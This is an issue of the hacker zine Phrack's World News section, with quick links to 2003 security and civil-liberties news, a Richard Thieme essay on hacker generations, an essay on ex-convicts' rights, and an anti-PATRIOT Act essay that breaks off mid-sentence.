+|=--------------=[ P H R A C K   W O R L D   N E W S ]=------------------=|
+|=-----------------------------------------------------------------------=|
+|=------------------=[ Phrack Combat Journalistz ]=----------------------=|
+
+Content
+
+    1 - Quickies
+    2 - Hacker Generations by Richard Thieme 
+    3 - Citizen Questions on Citizenship by Bootleg
+    4 - The Molting Wings of Liberty by Beaux75
+
+|=-----------------------------------------------------------------------=|
+|=-=[ Quick News ]=------------------------------------------------------=|
+|=-----------------------------------------------------------------------=|
+
+
+Microsoft got hit by SQL slammer worm:
+[1] http://www.cnn.com/2003/TECH/biztech/01/28/microsoft.worm.ap/index.html
+[2] http://www.thewmurchannel.com/technology/1940013/detail.html
+
+They say they cought 'Fluffi Bunny':
+[1] http://www.salon.com/tech/wire/2003/04/29/fluffi_bunni/index.html
+[2] http://www.nandotimes.com/technology/story/872265p-6086707c.html
+
+How Geroge W. Bush Won the 2004 Presidential Election. This article
+outlines the danger of electronic voting systems. It explains why voting
+systems are vulnerable to fraudulent manipulation by the companies
+manufactoring and supervising the systems.
+[1] http://belgium.indymedia.org/news/2003/07/70542.php
+
+FBI Says Iraw Situation May Spur 'Patriotic Hackers'
+[1] http://www.washingtonpost.com/wp-dyn/articles/A64049-2003Feb12.html 
+
+Over 5 million Visa/MasterCard accounts hacked into. This happens all the
+day long but once in a while is one journalist making a media hype out of
+it and everyone starts to go crazy about it. Wehehehhehee.
+[1] http://www.forbes.com/markets/newswire/2003/02/17/rtr881826.html
+
+The Shmoo group build a robot that drives around to find WiFi AccessPoints.
+Wonder how long it will take until the first hacker mounts a WiFi + Antenna
+under a low-flying zeppelin / model aircraft...
+[1] http://news.com.com/2100-1039_3-5059541.html
+
+Linux achieved the Common Criteria security certification and is now
+allowed to be used by the federal government and other organizations.
+[1] http://www.fcw.com/fcw/articles/2003/0804/web-linx-08-06-03.asp
+
+$55 million electronic voting machines can be hacked into by a
+15-year-old newbie. Guess who will win the 2004' election?
+[1] http://www.washingtonpost.com/wp-dyn/articles/A25673-2003Aug6.html
+
+UK Intelligence and Security Report Aug 2003. I like the quote: "Britain
+has a complicated and rather bureaucratic political control over its int
+elligence and security community and one that tends to apply itself to
+long-term targets and strategic intelligence programs, but has little real
+influence on the behaviour and operations of SIS or MI5."
+[1] http://cryptome.org/uk-intel.doc
+
+Man jailed for linking to bomb-side. Judge, psst, *hint*: Try
+http://www.google.com -> homemade bombs -> I feel lucky. Eh? Going to jail
+google now? Eh?
+[1] http://www.cnn.com/2003/TECH/internet/08/05/anarchist.prison.ap/index.html
+
+The military is thinking of planting propaganda and misleading stories in
+the international media [1]. A new department has been set up inside the
+Pentagon with the Orwellian title of the Office of Strategic Influence.
+The government had to rename the new department when its name leaked ([2]).
+[1] http://news.bbc.co.uk/1/hi/world/americas/1830500.stm
+[2] http://www.fas.org/sgp/news/secrecy/2002/11/112702.html
+[3] http://www.fas.org/sgp/news/2002/11/dod111802.html
+
+
+|=-----------------------------------------------------------------------=|
+|=-=[ Hacker Generations ]=----------------------------------------------=|
+|=-----------------------------------------------------------------------=|
+
+Hacker Generations
+
+by
+
+Richard Thieme <rthieme at thiemeworks.com>
+
+
+    Richard Thieme speaks writes and consults about life on the edge,
+creativity and innovation, and the human dimensions of technology. His
+exploraitions of hacking, security, and many other things can be found at
+http://www.thiemeworks.com). A frequent speaker at security conferences, he
+keynoted the Black Hat Briefings - Europe in Amsterdam this year, the
+security track of Tech Ed sponsored by Microsoft Israel in Eilat, and
+returns to keynote Hiver Con in Dublin for a second time in November. In
+addition to numerous security cons (Def Con 4,5,6,7,8,9,10,11and Black Hat
+1,2,3,4,5,6,7, Rubicon 2,3,4,5), he has spoken for the FBI, Infragard, the
+FS-ISAC, Los Alamos National Laboratory, and the US Department of the
+Treasury. Clients include Microsoft Israel, GE Medical Systems, and Network
+Flight Recorder.
+
+
+
+First, the meaning of hacker
+============================
+
+    The word originally meant an inventive type, someone creative and 
+unconventional, usually involved in a technical feat of legerdemain, a 
+person who saw doors where others saw walls or built bridges that others 
+thought were planks on which to walk into shark-filled seas. Hackers were 
+alive with the spirit of Loki or Coyote or the Trickster, moving with 
+stealth across boundaries, often spurning conventional ways of thinking and
+behaving. Hackers see deeply into the arbitrariness of structures, how form
+and content are assembled in subjective and often random ways and therefore
+how they can be defeated or subverted. They see atoms where others see a 
+seeming solid, and they know that atoms are approximations of energies, 
+abstractions, mathematical constructions. At the top level, they see the 
+skull behind the grin, the unspoken or unacknowledged but shared 
+assumptions of a fallible humanity. Thats why, as in Zen monasteries, where 
+mountains are mountains and then they are not mountains and then they are 
+mountains again, hacker lofts are filled with bursts of loud spontaneous 
+laughter.
+
+    Then the playful creative things they did in the protected space of
+their mainframe heaven, a playfulness fueled by the passion to know, to
+solve puzzles, outwit adversaries, never be bested or excluded by arbitrary
+fences, never be rendered powerless, those actions began to be designated 
+acts of criminal intent.. That happened when the space inside the 
+mainframes was extended through distributed networks and ported to the rest 
+of the world where things are assumed to be what they seem. A psychic space 
+designed to be open, more or less, for trusted communities to inhabit, 
+became a general platform of communication and commerce and security became 
+a concern and an add-on. Legal distinctions which seemed to have been 
+obliterated by new technologies and a romantic fanciful view of cyberspace 
+a la Perry Barlow were reformulated for the new not-so-much cyberspace as 
+cyborgspace where everyone was coming to live. Technologies are first 
+astonishing, then grafted onto prior technologies, then integrated so 
+deeply they are constitutive of new ways of seeing and acting, which is 
+when they become invisible.
+
+    A small group, a subset of real hackers, mobile crews who merely
+entered and looked around or pilfered unsecured information, became the
+definition the media and then everybody else used for the word "hacker. "A
+hacker became a criminal, usually defined as a burglar or vandal, and the
+marks of hacking were the same as breaking and entering, spray painting
+graffiti on web site walls rather than brick, stealing passwords or credit
+card numbers.
+
+    At first real hackers tried to take back the word but once a word is
+lost, the war is lost.  Hackernow means for most people a garden variety of
+online miscreant and words suggested as substitutes like technophile just 
+don't have the same juice.
+
+    So let's use the word hacker here to mean what we know we mean because
+no one has invented a better word. We dont mean script kiddies, vandals, or
+petty thieves. We mean men and women who do original creative work and play
+at the tip of the bell curve, not in the hump, we mean the best and
+brightest who cobble together new images of possibility and announce them
+to the world. Original thinkers. Meme makers. Artists of pixels and empty
+spaces.
+
+
+Second, the meaning of hacker generations
+=========================================
+
+    In a speech at the end of his two terms as president, Dwight Eisenhower
+coined the phrase "military-industrial complex" to warn of the consequences 
+of a growing seamless collusion between the state and the private sector. 
+He warned of a changing approach to scientific research which in effect 
+meant that military and government contracts  were let to universities and 
+corporations, redefining not only the direction of research but what was 
+thinkable or respectable in the scientific world. At the same time, a 
+"closed world" as Paul N. Edwards phrased it in his book of the same name, 
+was evolving, an enclosed psychic landscape formed by our increasingly 
+symbiotic interaction with the symbol-manipulating and identity-altering 
+space of distributed computing, a space that emerged after World War II and 
+came to dominate military and then societal thinking.
+
+    Eisenhower and Edwards were in a way describing the same event, the 
+emergence of a massive state-centric collaboration that redefined our 
+psychic landscape. After half a century Eisenhower is more obviously 
+speaking of the military-industrial-educational-entertainment-and-media 
+establishment that is the water in which we swim, a tangled inescapable 
+mesh of collusion and self-interest that defines our global economic and 
+political landscape.
+
+    The movie calls it The Matrix. The Matrix issues from the fusion of
+cyborg space and the economic and political engines that drive it, a
+simulated world in which the management of perception is the cornerstone of
+war-and-peace (in the Matrix, war is peace and peace is war, as Orwell 
+foretold). The battlespace is as perhaps it always has been the mind of 
+society but the digital world has raised the game to a higher level. The 
+game is multidimensional, multi-valent, played in string space. The 
+manipulation of symbols through electronic means, a process which began 
+with speech and writing and was then engineered through tools of literacy 
+and printing is the currency of the closed world of our CyborgSpace and the 
+military-industrial engines that power it.
+
+    This Matrix then was created through the forties, fifties, sixties, and
+seventies, often invisible to the hackers who lived in and breathed it. The
+hackers noticed by the panoptic eye of the media and elevated to niche 
+celebrity status were and always have been creatures of the Matrix. The 
+generations before them were military, government, corporate and think-tank 
+people who built the machinery and its webbed spaces.
+
+    So I mean by the First Generation of Hackers, this much later
+generation of hackers that emerged in the eighties and nineties when the
+internet became an event and they were designated the First Hacker
+Generation, the ones who invented Def Con and all its spin-offs, who
+identified with garage-level hacking instead of the work of prior
+generations that made it possible.
+
+    Marshall McLuhan saw clearly the nature and consequences of electronic
+media but it was not television, his favorite example, so much as the 
+internet that provided illustrations for his text. Only when the Internet 
+had evolved in the military-industrial complex and moved through 
+incarnations like Arpanet and Milnet into the public spaces of our society 
+did people began to understand what he was saying.
+
+    Young people who became conscious as the Internet became public
+discovered a Big Toy of extraordinary proportions. The growing availability
+of cheap ubiquitous home computers became their platform and when they were
+plugged into one another, the machines and their cyborg riders fused. They 
+co-created the dot com boom and the public net, and made necessary the 
+security spaceperceived as essential today to a functional society. All day 
+and all night like Bedouin they roamed the network where they would, hidden 
+by sand dunes that changed shape and size overnight in the desert winds. 
+That generation of hackers inhabited Def Con in the "good old days," the 
+early nineties, and the other cons. They shaped the perception as well as 
+the reality of the public Internet as their many  antecedents at MIT, NSA, 
+DOD and all the other three-letter agencies co-created the Matrix.
+
+    So I mean by the First Generation of Hackers that extended or
+distributed network of passionate obsessive and daring young coders who
+gave as much as they got, invented new ways of sending text, images, sounds,
+and looked for wormholes that let them cross through the non-space of the
+network and bypass conventional routes. They constituted an online
+meritocracy in which they bootstrapped themselves into surrogate families
+and learned together by trial and error, becoming a model of self-directed
+corporate networked learning. They created a large-scale interactive system,
+self-regulating and self-organizing, flexible, adaptive, and unpredictable,
+the very essence of a cybernetic system.
+
+    Then the Second Generation came along.  They had not co-created the
+network so much as found it around them as they became conscious.  Just a
+few years younger, they inherited the network created by their elders. The
+network was assumed and socialized them to how they should think and act.
+Video games were there when they learned how to play. Web sites instead of
+bulletin boards with everything they needed to know were everywhere. The 
+way a prior generation was surrounded by books or television and became 
+readers and somnambulistic watchers , the Second Generation was immersed in 
+the network and became surfers. But unlike the First Generation which knew 
+their own edges more keenly, the net made them cyborgs without anyone 
+noticing. They were assimilated. They were the first children of the Matrix.
+
+    In a reversal of the way children learned from parents, the Second 
+Generation taught their parents to come online which they did but with a 
+different agenda. Their elders came to the net as a platform for business, 
+a means of making profits, creating economies of scale, and expanding into 
+a global market. Both inhabited a simulated world characterized by porous 
+or disappearing boundaries and if they still spoke of a digital frontier, 
+evoking the romantic myths of the EFF and the like, that frontier was much 
+more myth than fact, as much a creation of the dream weavers at CFP as the 
+old west was a creation of paintings, dime novels and movies.
+
+    They were not only fish in the water of the Matrix, however, they were
+goldfish in a bowl. That environment to which I have alluded, the 
+military-industrial complex in which the internet evolved in the first 
+place, had long since built concentric circles of observation or 
+surveillance that enclosed them around. Anonymizers promising anonymity 
+were created by the ones who wanted to know their names. Hacker handles and 
+multiple nyms hid not only hackers but those who tracked them. The extent 
+of this panoptic world was hidden by denial and design. Most on it and in 
+it didn't know it. Most believed the symbols they manipulated as if they 
+were the things they represented, as if their tracks really vanished when 
+they erased traces in logs or blurred the means of documentation. They 
+thought they were watchers but in fact were also watched. The Eye that 
+figures so prominently in Blade Runner  was always open, a panoptic eye. 
+The system could not be self-regulating if it were not aware of itself, 
+after all. The net is not a dumb machine, it is sentient and aware because 
+it is fused bone-on-steel with its cyborg riders and their sensory and 
+cognitive extensions.
+
+    Cognitive dissonance grew as the Second Generation spawned the Third.
+The ambiguities of living in simulated worlds, the morphing of multiple 
+personas or identities, meant that no one was ever sure who was who. 
+Dissolving boundaries around individuals and organizational structures 
+alike ("The internet? C'est moi!") meant that identity based on loyalty, 
+glue born of belonging to a larger community and the basis of mutual trust, 
+could not be presumed.
+
+    It's all about knowing where the nexus is, what transpires there at the
+connections. The inner circles may be impossible to penetrate but in order 
+to recruit people into them, there must be a conversation and that 
+conversation is the nexus, the distorted space into which one is 
+unknowingly invited and often subsequently disappears. Colleges, 
+universities, businesses, associations are discovered to be Potemkin 
+villages behind which the real whispered dialogue takes place. The closed 
+and so-called open worlds interpenetrate one another to such a degree that 
+the nexus is difficult to discern. History ends and numerous histories take 
+their place, each formed of an arbitrary association and integration of 
+data classified or secret at multiple levels and turned into truths, 
+half-truths, and outright lies.
+
+    Diffie-Hellman's public key cryptography, for example, was a triumph of
+ingenious thinking, putting together bits of data, figuring it out, all 
+outside the system, but Whit Diffie was abashed when he learned that years 
+earlier (1969) James Ellis inside the closed worldof British intelligence 
+had already been there and done that. The public world of hackers often 
+reinvents what has been discovered years earlier inside the closed world of 
+compartmentalized research behind walls they can not so easily penetrate. 
+(People really can keep secrets and do.)  PGP was well, do you really think 
+that PGP was news to the closed world?
+
+    In other words, the Second Generation of Hackers, socialized to a
+networked world, also began to discover another world or many other worlds
+that included and transcended what was publicly known. There have always
+been secrets but there have not always been huge whole secret WORLDS whose
+citizens live with a different history entirely but thats what we have 
+built since the Second World War. Thats the metaphor at the heart of the 
+Matrix and that's why it resonates with the Third Generation. A surprising 
+discovery for the Second Generation as it matured is the basis for 
+high-level hacking for the Third.
+
+    The Third Generation of Hackers knows it was socialized to a world 
+co-created by its legendary brethren as well as numerous nameless men and 
+women. They know that we inhabit multiple thought-worlds with different 
+histories, histories dependent on which particular bits of data can be 
+bought on the black market for truth and integrated into Bigger Pictures. 
+The Third Generation knows there is NO one Big Picture, there are only 
+bigger or smaller pictures depending on the pieces one assembles. 
+Assembling those pieces, finding them, connecting them, then standing back 
+to see what they say - that is the essence of Third Generation hacking. 
+That is the task demanded by the Matrix which is otherwise our prison, 
+where inmates and guards are indistinguishable from each other because we 
+are so proud of what we have built that we refuse to let one another escape.
+
+    That challenge demands that real Third Generation hackers be expert at 
+every level of the fractal that connects all the levels of the network. It 
+includes the most granular examination of how electrons are turned into 
+bits and bytes, how percepts as well as concepts are framed and transported 
+in network-centric warfare/peacefare, how all the layers link to one 
+another, which distinctions between them matter and which dont. How the 
+seemingly topmost application layer is not the end but the beginning of the 
+real challenge, where the significance and symbolic meaning of the 
+manufactured images and ideas that constitute the cyborg network create a 
+trans-planetary hive mind. That's where the game is played today by the 
+masters of the unseen, where those ideas and images become the means of 
+moving the herd, percept turned into concept, people thinking they actually 
+think when what has in fact already been thought for them has moved on all 
+those layers into their unconscious constructions of reality.
+
+    Hacking means knowing how to find data in the Black Market for truth, 
+knowing what to do with it once it is found, knowing how to cobble things 
+together to build a Big Picture. The puzzle to be solved is reality itself, 
+the nature of the Matrix, how it all relates. So  unless youre hacking the 
+Mind of God, unless you're hacking the mind of society itself, you arent 
+really hacking at all. Rather than designing arteries through which the oil 
+or blood of a cyborg society flows, you are the dye in those arteries, all 
+unknowing that you function like a marker or a bug or a beeper or a gleam 
+of revealing light. You become a means of control, a symptom rather than a 
+cure.
+
+    The Third Generation of Hackers grew up in a simulated world, a
+designer society of electronic communication, but sees through the fictions
+and the myths. Real hackers discover in their fear and trembling the
+courage and the means to move through zones of annihilation in which
+everything we believe to be true is called into question in order to
+reconstitute both what is known and our knowing Self on the higher side of 
+self-transformation. Real hackers know that the higher calling is to hack 
+the Truth in a society built on designer lies and then the most subtle, 
+most difficult part - manage their egos and that bigger picture with 
+stealth and finesse in the endless ambiguity and complexity of their lives.
+
+    The brave new world of the past is now everyday life. Everybody knows
+that identities can be stolen which means if they think that they know they
+can be invented. What was given to spies by the state as a sanction for 
+breaking laws is now given to real hackers by technologies that make spies 
+of us all.
+
+    Psychological operations and information warfare are controls in the
+management of perception taking place at all levels of society, from the 
+obvious distortions in the world of politics to the obvious distortions of 
+balance sheets and earnings reports in the world of economics. 
+Entertainment, too, the best vehicle for propaganda according to Joseph 
+Goebbels, includes not only obvious propaganda but movies like the Matrix 
+that serve as sophisticated controls, creating a subset of people who think 
+they know and thereby become more docile.  Thanks for that one, SN.
+
+    The only free speech tolerated is that which does not genuinely
+threaten the self-interest of the oligarchic powers that be.  The only
+insight acceptable to those powers is insight framed as entertainment or an
+opposition that can be managed and manipulated.
+
+    Hackers know they don't know what's real and know they can only build
+provisional models as they move in stealthy trusted groups of a few. They 
+must assume that if they matter, they are known which takes the game 
+immediately to another level.
+
+    So the Matrix like any good cybernetic system is self-regulating,
+builds controls, has multiple levels of complexity masking partial truth as
+Truth. Of what else could life consist in a cyborg world? All over the
+world, in low-earth orbit, soon on the moon and the asteroid belt, this
+game is played with real money. It is no joke. The surrender of so many
+former rights - habeas corpus, the right to a trial, the freedom from
+torture during interrogation, freedom of movement without papers in ones
+own country - has changed the playing field forever, changed the game.
+
+    Third Generation Hacking means accepting nothing at face value,
+learning to counter counter-threats with counter-counter-counter-moves. It
+means all means and ends are provisional and likely to transform themselves
+like alliances on the fly.
+
+    Third Generation Hacking is the ability to free the mind, to live
+vibrantly in a world without walls.
+
+    Do not be deceived by uniforms, theirs or ours, or language that serves
+as uniforms, or behaviors. There is no theirs or ours, no us or them. There
+are only moments of awareness at the nexus where fiction myth and fact 
+touch, there are only moments of convergence. But if it is all on behalf of 
+the Truth it is Hacking. Then it can not fail because the effort defines 
+what it means to be human in a cyborg world. Hackers are aware of the 
+paradox, the irony and the impossibility of the mission as well as the 
+necessity nevertheless of pursuing it, despite everything. That is, after 
+all, why they're hackers.
+
+
+Thanks to Simple Nomad, David Aitel, Sol Tzvi, Fred Cohen, Jaya Baloo, and
+many others for the ongoing conversations that helped me frame this article.
+
+
+
+Richard Thieme
+
+|=-----------------------------------------------------------------------=|
+|=-=[ Citizen Questions on Citizenship ]=--------------------------------=|
+|=-----------------------------------------------------------------------=|
+
+by Bootleg
+
+(Please READ everything then check out my posts by Bootleg on this forum:
+http://forums.gunbroker.com/topic.asp?TOPIC_ID=22130)
+
+"A Citizen Questions on Citizenship" or "Are outlaws screwing your inlaws
+ without laws?"
+
+    What's the difference in "Rights" between a citizen who is an excon and
+a citizen who is not? What law gives the government the right to
+permanently take away certain rights from an excon without a judge
+proscribing the rights be taken away? When has an excon ever been taken to
+court to have his civil rights stripped away permanently?
+
+    When has an excon ever been arrested and prosecuted on any law that 
+specifically says since they are excons they must now go to trial to fight
+for their right to keep all their civil rights? In American law, ONLY a
+JUDGE can proscribe penalties against a citizen and only after being
+allowed a trial by his peers and only for specific charges brought against
+him. How then can an excons rights be stripped away if he has never been in
+front of a judge for a charge of possessing civil rights illegally? What
+law exists that states certain civil rights exist only for certain people? 
+
+    I've been convicted of several felonies and not once during sentencing
+has any judge ever said I was to loose any of my civil rights as part of my
+sentence! If no judge has ever stripped my rights as part of any criminal
+sentence they gave me, how then can I not still have them? Furthermore...
+why does my wife and children also loose some of their civil rights simply
+because they are part of my family even though they have never committed
+any crime????
+
+    Are excons having their civil rights taken WITHOUT due process and
+without equal protection the true intent of the Bill of Rights and the
+Constitution? Or should all rights be restored after an excon pays his debt
+to society like they have always been throughout our history? Since an
+excon is still a citizen, then what kind of citizen is he under our
+Constitution that states all citizens have equal rights? If the government
+can arbitrarily take most of an excons rights away without due process, can
+they then take one or more rights away from other groups of citizens as
+they see fit thus making a layered level of citizenship with only certain
+groups enjoying full rights? Either they can do this or they can't
+according to the Constitution. If they do it to even one group of
+citizens...excons, then are they not violating the Constitution? Are all
+American citizens "EQUAL" the Constitution and is that not the intent of
+those that wrote the constitution as evidenced by their adding the "Bill of
+Rights" guaranteeing "Equality" for ALL citizens?
+
+    Just as "blacks" were slaves and had no rights even as freemen in the
+past, even as women couldn't vote till the 20th century, even as the aged
+and disabled were denied equal rights till recently, so now does one more
+group of millions of citizens exist that are being uncoonstitutionally
+denied their birthright as American citizens. This group is the millions of
+American citizens that are exconvicts and their families! ARE THEY CITIZENS
+OR NOT? The law says they still are citizens even if they are excons. If
+this is the case, then under our Constitution, are not ALL citizens equal
+having equal rights?
+
+    If so, then exconvicts are illegally being persecuted and discriminated
+against along with their families. How would you rectify this?
+
+Nuff Said-
+Bootleg
+
+|=-----------------------------------------------------------------------=|
+|=-=[ The Molting Wings of Liberty ]=------------------------------------=|
+|=-----------------------------------------------------------------------=|
+
+by Beaux75
+
+Thesis:  The USA PATRIOT Act (USAPA) is too restrictive of the rights
+mandated by the Constitution and must be repealed.
+
+I.  Introduction
+        A.  Circumstances leading up to the USAPA
+        B.  A rushed job
+        C.  Using public anxiety and war fever to push an unjust bill
+II.  Domestic spying and the end of probable cause
+        A.  Breaking down restrictions on unlawful surveillance
+        B.  Side-stepping court orders and accountability
+        C.  Sneak and peek
+III.  Immigrants as suspects
+        A.  Erosion of due process for legal immigrants
+        B.  Criminal behavior now subject to detention and deportation
+        C.  Denying entry based on ideology
+IV.  Defining the threat
+        A.  Accepted definition of terrorism
+        B.  The USAPA and its overbroad definition
+        C.  "Domestic terrorism"
+V.  Silencing dissent
+        A.  Questioning government policy can now be terrorism
+        B.  Public scrutiny encouraged by present administration
+                1.  Recruiting Americans to inform on Americans
+                2.  Blind faith in political matters
+                3.  Keeping our leaders in check and our citizens informed
+VI.  Refuting common retort
+        A.  "I do not want to be a victim of terrorism."
+        B.  "I have nothing to worry about because I am not a terrorist."
+        C.  "I am willing to compromise my civil rights to feel safer."
+VII.  The future of civil rights at the present pace
+        A.  Expansion of unprecedented and unchecked power
+        B.  The illusion of democracy and our descent into fascism
+        C.  Our leaders no longer have the public's best interests in mind
+VIII.  Conclusion
+        A.  The USAPA trounces the rights guaranteed to all Americans
+        B.  People must stay informed
+        C.  Vigilance in the struggle to maintain freedom
+
+        Pros:
+                1.  Act is unjust and violates civil liberties
+                2.  Definition of "terrorist" reaches too far
+                3.  Act is a stepping-stone toward fascism
+                4.  Signals the decline of a democracy
+        Cons:
+                1.  Limits the effectiveness of anti-terrorism efforts
+                2.  No longer have broad and corruptible powers
+                3.  Must find new ways to prevent terrorism
+                4.  Must maintain the rights of the people
+
+
+
+                       The Molting Wings of Liberty
+
+        In the darker alleys of Washington, DC, something very disturbing
+is taking shape.  Assaults on our civil liberties and our very way of life
+are unfolding before us, yet somehow we are blind to it.  What is shielding
+us from the truth about the future of America is the cataract of ignorance
+and misinformation brought on by mass paranoia.  One thing is definite and
+overwhelming when the haze is lifted: our elected officials are knowingly
+sacrificing our rights under the guise of national security.
+
+        In the six weeks after the worst terrorist attacks on US soil, a
+bill was hastily written and pushed through congress granting the executive
+branch extensive and far reaching powers to combat terrorism.  Thus, the
+awkwardly named "Uniting and Strengthening America by Providing Appropriate
+Tools Required to Intercept and Obstruct Terrorism" or USA PATRIOT Act
+(USAPA) was signed into law on October 26, 2001.  President George W. Bush,
+in his remarks on the morning of the bill's signing stated, "Today we take
+an essential step in defeating terrorism, while protecting the
+constitutional rights of all Americans" (1).  How can it be said that this
+law protects our constitutional rights when it can be utilized to violate
+five of the ten amendments in the Bill of Rights?  The USAPA is a classic
+example of political over-correction: it may provide our government and law
+enforcement agencies with "appropriate tools" for combating terrorism, but
+at what cost to the basic freedoms that this country was founded upon?
+
+        Simply put, the USA PATRIOT Act is extremely dangerous to the
+American people because its potential for corruptibility is so great.
+Still, the 342-page tract was forced through Congress in near record time
+with next to no internal debate and very little compromised revision.
+Despite massive objection from civil rights watchdogs, it passed by an
+unprecedented vote of 356-to-66 in the House of Representatives, and
+98-to-1 in the Senate (Chang).  The Bush administration considered the
+USAPA an astounding bipartisan success, but neglected to inform the public
+of exactly what its provisions called for and conveniently left out that,
+in order to gain such an encompassing victory, many of the new powers were
+superceded by a "sunset clause" making some of the more sweeping and
+intrusive abilities subject to expiration on December 31, 2005.  Most
+recently, there have been numerous reports of the Republican controlled
+Congress and their attempts to lift the sunset clause making these broad
+powers permanent ("GOP Wants")
+
+        Admittedly, the abilities mandated in the USAPA might help to
+counteract terrorism to a minor degree, but the price of such inspired
+safety means the systematic retooling of the very principles that every
+American citizen is entitled to.  There is no doubt that this legislation
+is a result of public outcry to ensure the events of September 11, 2001
+never happen again, but the administration's across-the-board devotion to
+internal secrecy was largely able to keep the bill from public eyes until
+after it was jettisoned into law.  Even now, more than a year and a half
+after its inception, no one seems to know what the USAPA is or does.
+
+        From the Senate floor, under scrutiny for his lone vote against the
+USAPA legislation, Wisconsin Senator Russ Feingold delivered his thoughts
+on the bill:
+        There is no doubt that if we lived in a police state, it would be
+        easier to catch terrorists.  If we lived in a country where police
+        were allowed to search your home at any time for any reason; if we
+        lived in a country where the government is entitled to open your
+        mail, eavesdrop on your phone conversations, or intercept your
+        e-mail communications; if we lived in a country where people could
+        be held in jail indefinitely based on what they write or think, or
+        based on mere suspicion that they are up to no good, the
+        government would probably discover more terrorists or would-be
+        terrorists, just as it would find more lawbreakers generally.  But
+        that wouldn't be a country in which we would want to live.  (qtd.
+        in Hentoff)
+
+        Senator Feingold's words make up a very relevant issue that has
+been mentioned, but largely ignored by the Bush administration.  It seems
+reasonable that most Americans would be willing to compromise certain
+liberties in order to regain the necessary illusion of safety.  But what is
+not universal is that those compromises become permanent.  In the wake of
+recent Republican activity and the other proposed methods of quashing
+terrorism, it is becoming more and more vital that the people of America
+educate themselves on this issue and urge their leaders to repeal the USAPA
+on the grounds that it is grossly unconstitutional.
+
+        At the heart of the USAPA, is its intent to break down the checks
+and balances among the three branches of government, allowing for a
+wholesale usurping of dangerous powers by the executive branch.  Because of
+this bill, the definition of terrorism has been broadened to include crimes
+not before considered such; our first amendment rights of free speech,
+assembly and petition can now fall under the heading of "terrorist
+activity" and thusly, their usage will surely be discouraged; by merely
+being suspected of a crime, any crime, it can strip legal immigrants of
+their civil rights and subject them to indefinite detainment and possible
+deportation; and most alarmingly of all, in a fit of extreme paranoia, it
+allows for unprecedented domestic spying and intelligence gathering in a
+cold war like throwback to East Berlin's Ministry of State Security
+(STASI).
+
+        On the subject of domestic spying, news analyst Daniel Schorr, in
+an interview during All Things Considered on National Public Radio in the
+latter half of 2002 said, "Spying on Americans in America is a historic
+no-no that was reconfirmed in the mid-1970s when the CIA, the FBI and the
+NSA got into a peck of trouble with congress and the country for conducting
+surveillance on Vietnam War dissenters. A no-no, that is until September
+11th.  Since then, the Bush administration has acted as though in order to
+protect you, it has to know all about you and everyone" (Neary).
+
+        Never before in the United States have law enforcement and
+intelligence agencies had such sweeping approval to institute programs of
+domestic surveillance.  In the past, things like wire-tapping, Internet and
+e-mail monitoring, even access to library records were regulated by
+judicial restrictions in conjunction with the fourth amendment and
+"probable cause." Because of the USAPA, warrants have been made virtually
+inconsequential and probable cause has become a thing of the past.  Medical
+records, bank transactions, credit reports and a myriad of other personal
+records can now be used in intel gathering (Collins).  Even the
+restrictions on illegally gained surveillance and so-called "sneak and
+peek" searches (that allow for covert, unwarranted, and in many cases
+unknown, searches and possible seizures of private property) have been
+lifted to the point of perhaps being admissible as evidence.  Mind you,
+this is not just for suspicion of terrorist activity, but rather all
+criminal activity and it can be corrupted to spy on anyone, regardless of
+being a suspect or not.  In addition to all of this, there is a clause in
+the USAPA that insulates the agencies who use and abuse these powers from
+any wrong doing as long as they can illustrate how their actions pertain to
+national security (Chang).  Under these provisions, everyone is a suspect,
+regardless of guilt.  When no meaningful checks and balances are in play,
+there is enormous capacity for corruption.
+
+        For the sake of argument, say that an administration has a faceless
+enemy in which they know to be affiliated with an organization that
+questions recent government policy.  With this new power, the entire
+organization and all of its present, past and future members can be spied
+on by local and national law enforcement agencies.  Thanks to unchecked
+sneak and peek searches, the members' private lives are now open for
+scrutiny and the intelligence gathered can be used to trump up charges of
+wrong-doing, even though the organization and its members have had their
+first and fourth amendments clearly violated.  And because of asset
+forfeiture laws already long in place, the government can now seize the
+organization's and its members' property at will as long as they are
+labeled as suspects.  Whether the case makes it to a courtroom or not is
+irrelevant.  The government can now publicly question the integrity of the
+organization, thereby damaging its credibility and possibly negating its
+cause.  All this, and much worse, can now be done legally and virtually
+without accountability.
+
+        This closely parallels the 1975 Watergate investigation.  On this
+topic, Jim McGee, journalist for The Washington Post, writes, "After wading
+through voluminous evidence of intelligence abuses, a committee led by Sen.
+Frank Church warned that domestic intelligence-gathering was a 'new form of
+governmental power' that was unconstrained by law, often abused by
+presidents and always inclined to grow" (1).
+
+        Another flagrant disregard for basic civil and human rights is the
+USAPA's stance on criminality and immigration.  We have already seen
+immigrants suspected of crimes being detained unjustly.  In the near
+future, we should expect to see a rise in deportation as well as a further
+erosion of due process for legal immigrants.  It has now become legal to
+detain immigrants, whether under suspicion of criminality or not, for
+indefinite periods of time and without access to an attorney (Chang).  This
+is in clear violation of their constitutional rights, but with the fear of
+terrorism looming overhead, anyone who champions their cause is subject to
+public survey.  Immigration is a hot potato of unjust activity, but one
+that many Americans seem apt to ignore.  Newcomers to our country are
+already treated as inferiors by our government and now, because of the
+USAPA legislation, they are treated as suspects before any crime is even
+committed.  More alarmingly, federal law enforcement agencies now have
+influence to keep certain ethnicities out of America based on "conflicting
+ideologies" (Chang).  The message being sent: conform to American standards
+and belief systems or risk deportation.  The clause sounds more like a
+scare tactic in order to keep what some deem as undesirables at bay, rather
+than a tool for preventing terrorism.
+
+        Even the definition of "terrorism" has undergone a major overhaul
+in the USAPA.  Since 1983, the United States defined terrorism as "the
+premeditated, politically motivated violence perpetrated against
+noncombatant targets by subnational groups or clandestine agents, usually
+intended to influence an audience" (Chang).  Essentially, it draws the line
+at people who intend to impact a government through violence of its
+civilians.  This definition has been around for close to twenty years and
+has served its purpose well because of its straightforwardness.  It
+addresses the point, and it does not overreach its bounds by taking into
+consideration acts or organizations that are not related to terrorism.  As
+of October 26, 2001, the definition has become muddled enough to include
+"intimidation of civilian population," "affecting the conduct of government
+through mass destruction, assassination or kidnapping," or any act that is
+"dangerous to human life."  It also spurs off to include "domestic
+terrorism" which is an act of terrorism by an internal organization (ACLU
+04-Apr-03).  All of these pieces can be legitimately molded to include
+activists, protestors, looters and rioters (all potentially dangerous to
+human life); embezzlers and so-called computer hackers (dangerous to
+financial institutions and therefore intimidating to civilians and
+government); serial killers, mass murderers, serial rapists (dangerous to
+human life and intimidation of civilians); and can even be stretched to the
+point of including writers, publishers, journalists, musicians, comedians,
+pundits and satirists based solely on their scope of influence.  To think
+that by increasing the size of the terrorism umbrella, organizations like
